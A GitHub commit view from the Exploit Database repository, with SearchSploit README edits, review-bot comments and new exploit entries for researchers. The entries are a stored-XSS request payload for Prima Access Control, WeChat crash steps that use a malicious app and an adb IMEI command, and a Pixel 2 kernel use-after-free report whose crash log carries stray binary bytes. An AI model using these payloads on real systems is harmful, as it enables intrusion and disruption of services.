Merge branch 'master' into misc

g0tmi1k 2020-04-06 13:36:23 +01:00 committed by GitHub
commit a5f8a059f5
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1537 changed files with 166536 additions and 318 deletions

View file

@ -7,12 +7,12 @@ Our repositories are:
- Binary Exploits: [https://github.com/offensive-security/exploitdb-bin-sploits](https://github.com/offensive-security/exploitdb-bin-sploits)
- Papers: [https://github.com/offensive-security/exploitdb-papers](https://github.com/offensive-security/exploitdb-papers)
The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of [exploits](https://www.exploit-db.com/browse/), [shellcode](https://www.exploit-db.com/shellcode/) and [papers](https://www.exploit-db.com/papers/) gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away.
You can learn more about the project [here (about)](https://www.exploit-db.com/about-exploit-db/) and [here (history)](https://www.exploit-db.com/history/).
The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of [exploits](https://www.exploit-db.com/), [shellcode](https://www.exploit-db.com/shellcodes) and [papers](https://www.exploit-db.com/papers) gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away.
You can learn more about the project [here (Top Right -> About Exploit-DB)](https://www.exploit-db.com/) and [here (History)](https://www.exploit-db.com/history).
This repository is updated daily with the most recently added submissions. Any additional resources can be found in our [binary exploits repository](https://github.com/offensive-security/exploitdb-bin-sploits).
Exploits are located in the `/exploit/` directory, shellcodes can be found in the `/shellcode/` directory.
Exploits are located in the [`/exploits/`](https://github.com/offensive-security/exploitdb/tree/master/exploits) directory, shellcodes can be found in the [`/shellcodes/`](https://github.com/offensive-security/exploitdb/tree/master/shellcodes) directory.
- - -
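Review bot: the rewritten "learn more" line now sends the About link to the site root (https://www.exploit-db.com/) with a "Top Right -> About Exploit-DB" navigation hint instead of a direct page; if a stable About URL exists, link it directly so the README does not break when the site's menu changes. The rest of the hunk is consistent: the `/exploit/` -> `/exploits/` and `/shellcode/` -> `/shellcodes/` directory renames match the linked tree paths, and dropping the trailing slashes on the shellcode and papers URLs matches the SearchSploit manual URL changes later in this commit.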
@ -25,7 +25,7 @@ This project (and SearchSploit) is released under "[GNU General Public License v
# SearchSploit
Included with this repository is the **SearchSploit** utility, which will allow you to search through exploits, shellcodes and papers _(if installed)_ using one or more terms.
For more information, please see the **[SearchSploit manual](https://www.exploit-db.com/searchsploit/)**.
For more information, please see the **[SearchSploit manual](https://www.exploit-db.com/searchsploit)**.
## Usage/Example
@ -42,7 +42,7 @@ root@kali:~# searchsploit -h
searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
searchsploit linux reverse password
For more examples, see the manual: https://www.exploit-db.com/searchsploit/
For more examples, see the manual: https://www.exploit-db.com/searchsploit
=========
Options
@ -62,7 +62,7 @@ root@kali:~# searchsploit -h
--id Display the EDB-ID value rather than local path.
--nmap [file.xml] Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml).
Use "-v" (verbose) to try even more combinations
--exclude="term" Remove values from results. By using "|" to separated you can chain multiple values.
--exclude="term" Remove values from results. By using "|" to separate, you can chain multiple values.
e.g. --exclude="term1|term2|term3".
=======
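Review bot: the corrected `--exclude` help text still reads awkwardly ("By using "|" to separate, you can chain multiple values."); since the next line already gives the example, consider the shorter 'Separate multiple terms with "|" to chain them, e.g. --exclude="term1|term2|term3".' so the two lines read as one sentence.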
@ -95,7 +95,7 @@ Shellcodes: No Result
root@kali:~#
root@kali:~# searchsploit -p 39446
Exploit: Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)
URL: https://www.exploit-db.com/exploits/39446/
URL: https://www.exploit-db.com/exploits/39446
Path: /usr/share/exploitdb/exploits/windows_x86/local/39446.py
File Type: Python script, ASCII text executable, with CRLF line terminators
@ -108,9 +108,9 @@ root@kali:~#
## Install
SearchSploit requires either "CoreUtils" or "utilities" (e.g. `bash`, `sed`, `grep`, `awk`, etc.) for the core features to work.
The self updating function will require `git`, and the Nmap XML option to work, will require `xmllint` (found in the `libxml2-utils` package in Debian-based systems).
The self updating function will require `git`, and for the Nmap XML option to work, will require `xmllint` (found in the `libxml2-utils` package in Debian-based systems).
You can find a **more in-depth guide in the [SearchSploit manual](https://www.exploit-db.com/searchsploit/)**.
You can find a **more in-depth guide in the [SearchSploit manual](https://www.exploit-db.com/searchsploit)**.
**Kali Linux**
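Review bot: the replacement sentence in the Install section is still ungrammatical: "The self updating function will require `git`, and for the Nmap XML option to work, will require `xmllint`" leaves the second clause without a subject. Suggest: "The self-updating function requires `git`, and the Nmap XML option requires `xmllint` (found in the `libxml2-utils` package on Debian-based systems)." The manual URL change in the same hunk is consistent with the earlier hunks.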
@ -128,7 +128,7 @@ root@kali:~# apt -y install exploitdb-bin-sploits exploitdb-papers
**Git**
In short: clone the repository, add the binary into $PATH, and edit the config file to reflect the git path:
In short: clone the repository, add the binary into `$PATH`, and edit the config file to reflect the git path:
```
$ sudo git clone https://github.com/offensive-security/exploitdb.git /opt/exploitdb
@ -138,7 +138,7 @@ $ sudo ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit
**Homebrew**
If you have [homebrew](http://brew.sh/) ([package](https://github.com/Homebrew/homebrew-core/blob/master/Formula/exploitdb.rb), [formula](https://formulae.brew.sh/formula/exploitdb)) installed, running the following will get you setup:
If you have [homebrew](http://brew.sh/) ([package](https://github.com/Homebrew/homebrew-core/blob/master/Formula/exploitdb.rb), [formula](https://formulae.brew.sh/formula/exploitdb)) installed, running the following will get you set up:
```
user@MacBook:~$ brew update && brew install exploitdb
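Review bot: the Homebrew line keeps a plain-http link, `[homebrew](http://brew.sh/)`, while every other link in the README is https; switch it to https://brew.sh/ so readers are not sent to an install page over an unauthenticated channel. The "setup" -> "set up" wording fix is correct.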

View file

@ -0,0 +1,31 @@
# Exploit Title: Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-7671
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Prima Access Control 2.3.35 Authenticated Stored XSS
# PoC
POST /bin/sysfcgi.fx HTTP/1.1
Host: 192.168.13.37
Connection: keep-alive
Content-Length: 265
Origin: https://192.168.13.37
Session-ID: 10127047
User-Agent: Mozi-Mozi/44.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/html, */*; q=0.01
Session-Pc: 2
X-Requested-With: XMLHttpRequest
Referer: https://192.168.13.37/app/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
<requests><request name="CreateDevice"><param name="HwType" value="1000"/><param name="HwParentID" value="0"/><param name="HwLogicParentID" value="0"/><param name="HwName" value=""><script>alert("XSSz")</script>"/></request></requests>
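Review bot: the PoC request body in the last line of this file is shown as raw XML even though the headers declare `Content-Type: application/x-www-form-urlencoded` and `Content-Length: 265`; the XML as printed is about 235 bytes, so either the body was URL-encoded (or wrapped in a form parameter) in the real request and decoded for the write-up, or the Content-Length is stale. State which, so a reader reproducing or writing a detection rule for this request knows what the wire format looks like. Minor: "Tested on: NA" could carry the product version already given in "Version: 2.3.35".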

View file

@ -0,0 +1,55 @@
# Exploit Title: DoS Wechat with an emoji
# Date: 16-May-2019
# Exploit Author: Hong Nhat Pham
# Vendor Homepage: http://www.tencent.com/en-us/index.html
# Software Link: https://play.google.com/store/apps/details?id=com.tencent.mm
# Version: 7.0.4
# Tested on: Android 9.0
# CVE : CVE-2019-11419
Description:
vcodec2_hls_filter in libvoipCodec_v7a.so in WeChat application for
Android results in a DoS by replacing an emoji file (under the
/sdcard/tencent/MicroMsg directory) with a crafted .wxgf file.
Crash-log is provided in poc.zip file at
https://drive.google.com/open?id=1HFQtbD10awuUicdWoq3dKVKfv0wvxOKS
Vulnerability Type:
Denial of Service
Vendor of Product:
Tencent
Affected Product Code Base:
WeChat for Android - Up to latest version (7.0.4)
Affected Component:
Function vcodec2_hls_filter in libvoipCodec_v7a.so
Attack Type:
Local
Attack vector:
An malware app can crafts a malicious emoji file and overwrites the
emoji files under /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID].
Once the user opens any chat messages that contain an emoji, WeChat
will instantly crash.
POC:
Video at https://drive.google.com/open?id=1x1Z3hm4j8f4rhv_WUp4gW-bhdtZMezdU
User must have sent or received a GIF file in WeChat
Malware app must retrieve the phones IMEI. For POC, we can use the
below command
adb shell service call iphonesubinfo 1 | awk -F "'" '{print $2}' | sed
'1 d' | tr -d '.' | awk '{print}' ORS=-
Produce the malicious emoji file with the retrieved IMEI (use
encrypt_wxgf.py in poc.zip):
python encrypt.py crash4.wxgf [SIZE_OF_EMOJI_ON_SDCARD]
Replace /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID] with the
padded out.wxgf.encrypted
WeChat will crash now if a message that contains the overwritten emoji file
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46853.zip
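Review bot: the reproduction steps in this file reference scripts and outputs under different names: the text says to use "encrypt_wxgf.py in poc.zip", the command shown is "python encrypt.py crash4.wxgf [SIZE_OF_EMOJI_ON_SDCARD]", and the next step replaces the emoji with "the padded out.wxgf.encrypted"; the script and output names should agree with what is actually in the attached archive. The final step is also an incomplete sentence ("WeChat will crash now if a message that contains the overwritten emoji file"), presumably "... is opened". Smaller points: "An malware app can crafts a malicious emoji file and overwrites" should read "A malware app can craft a malicious emoji file and overwrite", and the header date "16-May-2019" does not follow the ISO format used by the other new files in this commit.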

View file

@ -0,0 +1,295 @@
The following issue exists in the android-msm-wahoo-4.4-pie branch of
https://android.googlesource.com/kernel/msm (and possibly others):
When kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable
entry with memtype KGSL_MEM_ENTRY_USER, it attempts to mark the entry's pages
as dirty using the function set_page_dirty(). This function first loads
page->mapping using page_mapping(), then calls the function pointer
mapping->a_ops->set_page_dirty.
The bug is that, as explained in upstream commit e92bb4dd9673
( https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e92bb4dd9673945179b1fc738c9817dd91bfb629),
the mapping of a page can be freed concurrently unless it is protected somehow
(e.g. by holding the page lock, or by holding a reference to the mapping).
For callers who don't hold any such lock or reference, set_page_dirty_lock() is
provided to safely mark a page as dirty:
==================================
/*
* set_page_dirty() is racy if the caller has no reference against
* page->mapping->host, and if the page is unlocked. This is because another
* CPU could truncate the page off the mapping and then free the mapping.
*
* Usually, the page _is_ locked, or the caller is a user-space process which
* holds a reference on the inode by having an open file.
*
* In other cases, the page should be locked before running set_page_dirty().
*/
int set_page_dirty_lock(struct page *page)
{
int ret;
lock_page(page);
ret = set_page_dirty(page);
unlock_page(page);
return ret;
}
==================================
To reproduce on a Pixel 2 (walleye):
- Check out the tree specified above.
- Enable KASAN in the kernel config.
- Apply the attached kernel patch kgsl-bigger-race-window.patch to make the
race window much bigger.
- Build and boot the kernel.
- Build the attached poc.c with
`aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`.
- Run the PoC on the device (adb push, then run from adb shell).
You should see a kernel crash like this; note KASAN's report of a UAF in
set_page_dirty():
==================================
<6>[ 445.698708] c3 688 mdss_fb_blank_sub: mdss_fb_blank+0x1d0/0x2b4 mode:0
<3>[ 447.372706] c3 2621 ==================================================================
<3>[ 447.372963] c3 2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0
<3>[ 447.380051] c3 2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621
<3>[ 447.387059] c3 2621
<4>[ 447.394762] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
<4>[ 447.397158] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[ 447.406473] c3 2621 Workqueue: kgsl-mementry _deferred_put
<4>[ 447.418479] c3 2621 Call trace:
<4>[ 447.418660] c3 2621 [<ffffffa689e8dfbc>] dump_backtrace+0x0/0x2b4
<4>[ 447.421952] c3 2621 [<ffffffa689e8e394>] show_stack+0x14/0x1c
<4>[ 447.428066] c3 2621 [<ffffffa68a2f3d2c>] dump_stack+0xa4/0xcc
<4>[ 447.433965] c3 2621 [<ffffffa68a07b254>] print_address_description+0x94/0x340
<4>[ 447.439870] c3 2621 [<ffffffa68a07b784>] kasan_report+0x1f8/0x340
<4>[ 447.447145] c3 2621 [<ffffffa68a079a10>] __asan_load8+0x74/0x90
<4>[ 447.453407] c3 2621 [<ffffffa68a0205b4>] set_page_dirty+0x4c/0xd0
<4>[ 447.459621] c3 2621 [<ffffffa68a6c5dec>] kgsl_mem_entry_destroy+0x1c0/0x218
<4>[ 447.465695] c3 2621 [<ffffffa68a6c63d8>] _deferred_put+0x34/0x3c
<4>[ 447.473017] c3 2621 [<ffffffa689edc124>] process_one_work+0x254/0x78c
<4>[ 447.479093] c3 2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718
<4>[ 447.485551] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130
<4>[ 447.491801] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40
<3>[ 447.497696] c3 2621
<3>[ 447.503818] c3 2621 Allocated by task 2684:
<4>[ 447.506206] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
<4>[ 447.511847] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
<4>[ 447.517829] c3 2621 [<ffffffa68a079e74>] kasan_kmalloc.part.5+0x50/0x124
<4>[ 447.523494] c3 2621 [<ffffffa68a07a198>] kasan_kmalloc+0xc4/0xe4
<4>[ 447.529547] c3 2621 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c
<4>[ 447.534931] c3 2621 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c
<4>[ 447.540572] c3 2621 [<ffffffa68a187bdc>] ext4_alloc_inode+0x28/0x234
<4>[ 447.546387] c3 2621 [<ffffffa68a0afe94>] alloc_inode+0x34/0xd0
<4>[ 447.552112] c3 2621 [<ffffffa68a0b19e8>] new_inode+0x20/0xe8
<4>[ 447.557318] c3 2621 [<ffffffa68a154214>] __ext4_new_inode+0xe8/0x1f00
<4>[ 447.562360] c3 2621 [<ffffffa68a17087c>] ext4_tmpfile+0xb4/0x230
<4>[ 447.568172] c3 2621 [<ffffffa68a09f9e8>] path_openat+0x934/0x1404
<4>[ 447.573556] c3 2621 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188
<4>[ 447.579027] c3 2621 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4
<4>[ 447.584407] c3 2621 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
<4>[ 447.589787] c3 2621 [<ffffffa689e842b0BCho<D5>
^@^@<90>^A,^A^Hp<D6>M>] el0_svc_naked+0x24/0x28
<3>[ 447.594909] c3 2621
<3>[ 447.599065] c3 2621 Freed by task 36:
<4>[ 447.601330] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
<4>[ 447.606461] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
<4>[ 447.612450] c3 2621 [<ffffffa68a07aa1c>] kasan_slab_free+0xb0/0x1c0
<4>[ 447.618091] c3 2621 [<ffffffa68a0770c0>] kmem_cache_free+0x80/0x2f8
<4>[ 447.623733] c3 2621 [<ffffffa68a1863f8>] ext4_i_callback+0x18/0x20
<4>[ 447.629363] c3 2621 [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264
<4>[ 447.634926] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130
<4>[ 447.640726] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40
<3>[ 447.645765] c3 2621
<3>[ 447.649913] c3 2621 The buggy address belongs to the object at 0000000000000000
<3>[ 447.649913] c3 2621 which belongs to the cache ext4_inode_cache of size 1048
<3>[ 447.652315] c3 2621 The buggy address is located 680 bytes inside of
<3>[ 447.652315] c3 2621 1048-byte region [0000000000000000, 0000000000000000)
<3>[ 447.667170] c3 2621 The buggy address belongs to the page:
<1>[ 447.680933] c3 2621 Unable to handle kernel paging request at virtual address ffffffd8929b3000
<1>[ 447.686392] c3 2621 pgd = 0000000000000000
<1>[ 447.695099] c3 2621 [ffffffd8929b3000] *pgd=0000000000000000, *pud=0000000000000000
<4>[ 447.706506] c3 2621 ------------[ cut here ]------------
<2>[ 447.706664] c3 2621 Kernel BUG at 0000000000000000 [verbose debug info unavailable]
<0>[ 447.711676] c3 2621 Internal error: Oops - BUG: 96000047 [#1] PREEMPT SMP
<4>[ 447.719517] c3 2621 Modules linked in:
<4>[ 447.729365] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
<4>[ 447.729573] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[ 447.738760] c3 2621 Workqueue: kgsl-mementry _deferred_put
<4>[ 447.750779] c3 2621 task: 0000000000000000 task.stack: 0000000000000000
<4>[ 447.750972] c3 2621 PC is at el1_sync+0x28/0xe0
<4>[ 447.757719] c3 2621 LR is at dump_page+0x10/0x18
<4>[ 447.762390] c3 2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5
<4>[ 447.767106] c3 2621 sp : ffffffd8929b2f60
<4>[ 447.775306] c3 2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0
<4>[ 447.784631] c3 2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000
<4>[ 447.789927] c3 2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8
<4>[ 447.795219] c3 2621 x23: ffffffd892e55500 x22: 0000000000000001
<4>[ 447.800513] c3 2621 x21: ffffffa68ba1aa00 x20: 0000000000000000
<4>[ 447.805809] c3 2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a
<4>[ 447.811105] c3 2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178
<4>[ 447.816400] c3 2621 x15: 0000000000000021 x14: 202c303030303030
<4>[ 447.821694] c3 2621 x13: 3030303030303030 x12: e95cc056ac940c73
<4>[ 447.826992] c3 2621 x11: ffffffd8929fb810 x10: ffffff8b12978008
<4>[ 447.832286] c3 2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558
<4>[ 447.837590] c3 2621 x7 : ffffffa68c69ec28 x6 : 0000000000000040
<4>[ 447.842872] c3 2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0
<4>[ 447.848170] c3 2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000
<4>[ 447.853468] c3 2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00
<4>[ 447.858765] c3 2621
<4>[ 447.858765] c3 2621 PC: 0xffffffa689e836a8:
<4>[ 447.859009] c3 2621 36a8 d503201f d503201f d503201f d503201f d503201f d503201f a90007e0 a9010fe2
<4>[ 447.873684] c3 2621 36c8 a90217e4 a9031fe6 a90427e8 a9052fea a90637ec a9073fee a90847f0 a9094ff2
<4>[ 447.881847] c3 2621 36e8 a90a57f4 a90b5ff6 a90c67f8 a90d6ffa a90e77fc 9104c3f5 d538411c f9400794
<4>[ 447.890005] c3 2621 3708 f90093f4 d2c01014 f9000794 d5384036 d5384017 a90f57fe d503201f d5382015
<4>[ 447.898172] c3 2621
<4>[ 447.898172] c3 2621 LR: 0xffffffa68a04d99c:
<4>[ 447.898371] c3 2621 d99c b000ce80 9113e000 97feface aa1303e0 9400affc f9400260 9117e2e1 528002a2
<4>[ 447.91300BCho<D6>
^@^@<90>^A+^A<98>3<8E><DA>8] c3 2621 d9bc 9106c021 8a000280 97ffff2c 17ffffe6 a9bf7bfd d2800002 910003fd 97ffffb4
<4>[ 447.921170] c3 2621 d9dc a8c17bfd d65f03c0 a9ac7bfd 910003fd a90153f3 a9025bf5 a90363f7 a9046bf9
<4>[ 447.929328] c3 2621 d9fc a90573fb d10443ff aa0003f3 9400afe5 aa1303e0 f8410402 f90033a2 9400af97
<4>[ 447.937494] c3 2621
<4>[ 447.937494] c3 2621 SP: 0xffffffd8929b2f20:
<4>[ 447.937693] c3 2621 2f20 8a04d9dc ffffffa6 929b2f60 ffffffd8 89e836e8 ffffffa6 204003c5 00000000
<4>[ 447.952331] c3 2621 2f40 00000000 00000000 00000000 00000000 ffffffff ffffffff 00000000 00000000
<4>[ 447.960491] c3 2621 2f60 214dbe00 ffffffbe 8ba1aa00 ffffffa6 00000000 00000000 8a04d8dc ffffffa6
<4>[ 447.968651] c3 2621 2f80 c429b7c0 ffffff87 00000000 00000000 00000040 00000000 8c69ec28 ffffffa6
<4>[ 447.976809] c3 2621
<0>[ 447.976941] c3 2621 Process kworker/3:3 (pid: 2621, stack limit = 0x0000000000000000)
<4>[ 447.979247] c3 2621 Call trace:
<4>[ 447.987122] c3 2621 Exception stack(0xffffffd8929b2d60 to 0xffffffd8929b2e90)
<4>[ 447.990662] c3 2621 2d60: ffffffbe214dbe00 0000008000000000 00000000836e2000 ffffffa689e836e8
<4>[ 447.997788] c3 2621 2d80: 00000000204003c5 0000000000000025 ffffffd8536fc908 0000000000000000
<4>[ 448.006468] c3 2621 2da0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[ 448.015098] c3 2621 2dc0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[ 448.023777] c3 2621 2de0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[ 448.032461] c3 2621 2e00: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[ 448.041195] c3 2621 2e20: 0000000000000000 e95cc056ac940c73 ffffffbe214dbe00 ffffffa68ba1aa00
<4>[ 448.049872] c3 2621 2e40: 0000000000000000 ffffffa68a04d8dc ffffff87c429b7c0 0000000000000000
<4>[ 448.058561] c3 2621 2e60: 0000000000000040 ffffffa68c69ec28 ffffffa68a21a558 ffffff8b12978007
<4>[ 448.067216] c3 2621 2e80: ffffff8b12978008 ffffffd8929fb810
<4>[ 448.075867] c3 2621 [<ffffffa689e836e8>] el1_sync+0x28/0xe0
<0>[ 448.081787] c3 2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4)
<4>[ 448.087496] c3 2621 ---[ end trace 8d4b2347f8b71fe7 ]---
<4>[ 448.087540] c4 2684 ------------[ cut here ]------------
<2>[ 448.087544] c4 2684 Kernel BUG at 0000000000000000 [verbose debug info unavailable]
<0>[ 448.087547] c4 2684 Internal error: Oops - BUG: 96000005 [#2] PREEMPT SMP
<4>[ 448.087553] c4 2684 Modules linked in:
<4>[ 448.087561] c4 2684 CPU: 4 PID: 2684 Comm: poc Tainted: G D 4.4.116-gbcd0ecccd040-dirty #45
<4>[ 448.087563] c4 2684 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[ 448.087565] c4 2684 task: 0000000000000000 task.stack: 0000000000000000
<4>[ 448.087578] c4 2684 PC is at qlist_free_all+0x3c/0x80
<4>[ 448.087581] c4 2684 LR is at qlist_free_all+0x7c/0x80
<4>[ 448.087585] c4 2684 pc : [<ffffffa68a07bbbc>] lr : [<ffffffa68a07bbfc>] pstate: 60400145
<4>[ 448.087586] c4 2684 sp : ffffffd87e3b3880
<4>[ 448.087591] c4 2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000
<4>[ 448.087595] c4 2684 x27: 000000000591e848 x26: ffffffd87e3b3920
<4>[ 448.087598] c4 2684 x25: 0000000000000140 x24: 0000000000000000
<4>[ 448.087601] c4 2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc
<4>[ 448.087604] c4 2684 x21: 0000000000000000 x20: ffffffd8929f8040
<4>[ 448.087607] c4 2684 x19: ffffffd8929f8040 x18: 00000000c8056d20
<4>[ 448.087611] c4 2684 x17: 000000002c754130 x16: 0000000085837409
<4>[ 448.087613] c4 2684 x15: 00000000a50d5ad3 x14: 0000000000000000
<4>[ 448.087617] c4 2684 x13: 0000000001075000 x12: ffffffffffffffff
<4>[ 448.087620] c4 2684 x11: 0000000000000040 x10: ffffff8b0fc76746
<4>[ 448.087623] c4 2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b
<4>[ 448.087626] c4 2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08
<4>[ 448.087629] c4 2684 x5 : fffffffffe8c0000 x4 : 0000000000000000
<4>[ 448.087632] c4 2684 x3 : fBCho<D7>
^@^@<90>^A*^A<91><F9>%5fffffd8929f7ff0 x2 : 0000000000000000
<4>[ 448.087635] c4 2684 x1 : dead0000000000ff x0 : 0000000000000000
<4>[ 448.087637] c4 2684
<4>[ 448.087637] c4 2684 PC: 0xffffffa68a07bb7c:
<4>[ 448.087646] c4 2684 bb7c 17fffff1 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 f9400013 b4000253
<4>[ 448.087655] c4 2684 bb9c 90000016 aa0103f5 aa0003f7 912ef2d6 14000002 aa1403f3 aa1503e0 b40001f5
<4>[ 448.087664] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff
<4>[ 448.087673] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93
<4>[ 448.087675] c4 2684
<4>[ 448.087675] c4 2684 LR: 0xffffffa68a07bbbc:
<4>[ 448.087684] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff
<4>[ 448.087692] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93
<4>[ 448.087701] c4 2684 bbfc 17fffff0 a9bc7bfd aa0003e2 910003fd a90153f3 f0012ed3 aa0003f4 b000eb40
<4>[ 448.087711] c4 2684 bc1c 910083a1 d538d083 913c8000 f90013bf 8b000060 f9452a63 f9001fa3 f90017bf
<4>[ 448.087712] c4 2684
<4>[ 448.087712] c4 2684 SP: 0xffffffd87e3b3840:
<4>[ 448.087722] c4 2684 3840 8a07bbfc ffffffa6 7e3b3880 ffffffd8 8a07bbbc ffffffa6 60400145 00000000
<4>[ 448.087731] c4 2684 3860 7e3b3920 ffffffd8 00000000 00000000 00000000 00000080 8b4ddfd0 ffffffa6
<4>[ 448.087740] c4 2684 3880 7e3b38c0 ffffffd8 8a07bf9c ffffffa6 8c656000 ffffffa6 8ca1f500 ffffffa6
<4>[ 448.087749] c4 2684 38a0 8ca1a000 ffffffa6 000000f7 00000000 8c68d000 ffffffa6 fabb3a00 ffffffd7
<4>[ 448.087750] c4 2684
<0>[ 448.087753] c4 2684 Process poc (pid: 2684, stack limit = 0x0000000000000000)
<4>[ 448.087754] c4 2684 Call trace:
<4>[ 448.087758] c4 2684 Exception stack(0xffffffd87e3b3680 to 0xffffffd87e3b37b0)
<4>[ 448.087763] c4 2684 3680: ffffffd8929f8040 0000008000000000 00000000836e2000 ffffffa68a07bbbc
<4>[ 448.087768] c4 2684 36a0: 0000000060400145 0000000000000025 0000000000000140 ffffffd7fabb3a00
<4>[ 448.087773] c4 2684 36c0: 0000000000000000 ffffffd87e3b37d0 ffffffd87e3b3720 ffffffa68a0768e0
<4>[ 448.087779] c4 2684 36e0: ffffffbe224a7d80 0000000000000000 ffffffd7fabb3a00 ffffffd7fabb3a00
<4>[ 448.087784] c4 2684 3700: 0000000100150015 ffffffd8929f7e00 0000000180150014 ffffffd899803b00
<4>[ 448.087789] c4 2684 3720: ffffffd87e3b3830 ffffffa68a078b38 ffffffbe224a7d80 ffffffd8929f7ff0
<4>[ 448.087794] c4 2684 3740: ffffffd7fabb3a00 e95cc056ac940c73 0000000000000000 dead0000000000ff
<4>[ 448.087799] c4 2684 3760: 0000000000000000 ffffffd8929f7ff0 0000000000000000 fffffffffe8c0000
<4>[ 448.087804] c4 2684 3780: ffffffd87e3b3a08 0000000000000000 ffffffd87e3b3a2b ffffff8b0fc76745
<4>[ 448.087808] c4 2684 37a0: ffffff8b0fc76746 0000000000000040
<4>[ 448.087813] c4 2684 [<ffffffa68a07bbbc>] qlist_free_all+0x3c/0x80
<4>[ 448.087819] c4 2684 [<ffffffa68a07bf9c>] quarantine_reduce+0x17c/0x1a0
<4>[ 448.087824] c4 2684 [<ffffffa68a07a1b4>] kasan_kmalloc+0xe0/0xe4
<4>[ 448.087828] c4 2684 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c
<4>[ 448.087832] c4 2684 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c
<4>[ 448.087840] c4 2684 [<ffffffa68a15d0dc>] ext4_inode_attach_jinode+0x9c/0x118
<4>[ 448.087844] c4 2684 [<ffffffa68a150d74>] ext4_file_open+0xc8/0x21c
<4>[ 448.087848] c4 2684 [<ffffffa68a087488>] do_dentry_open+0x350/0x4ec
<4>[ 448.087851] c4 2684 [<ffffffa68a087930>] finish_open+0x74/0xa8
<4>[ 448.087857] c4 2684 [<ffffffa68a09fa34>] path_openat+0x980/0x1404
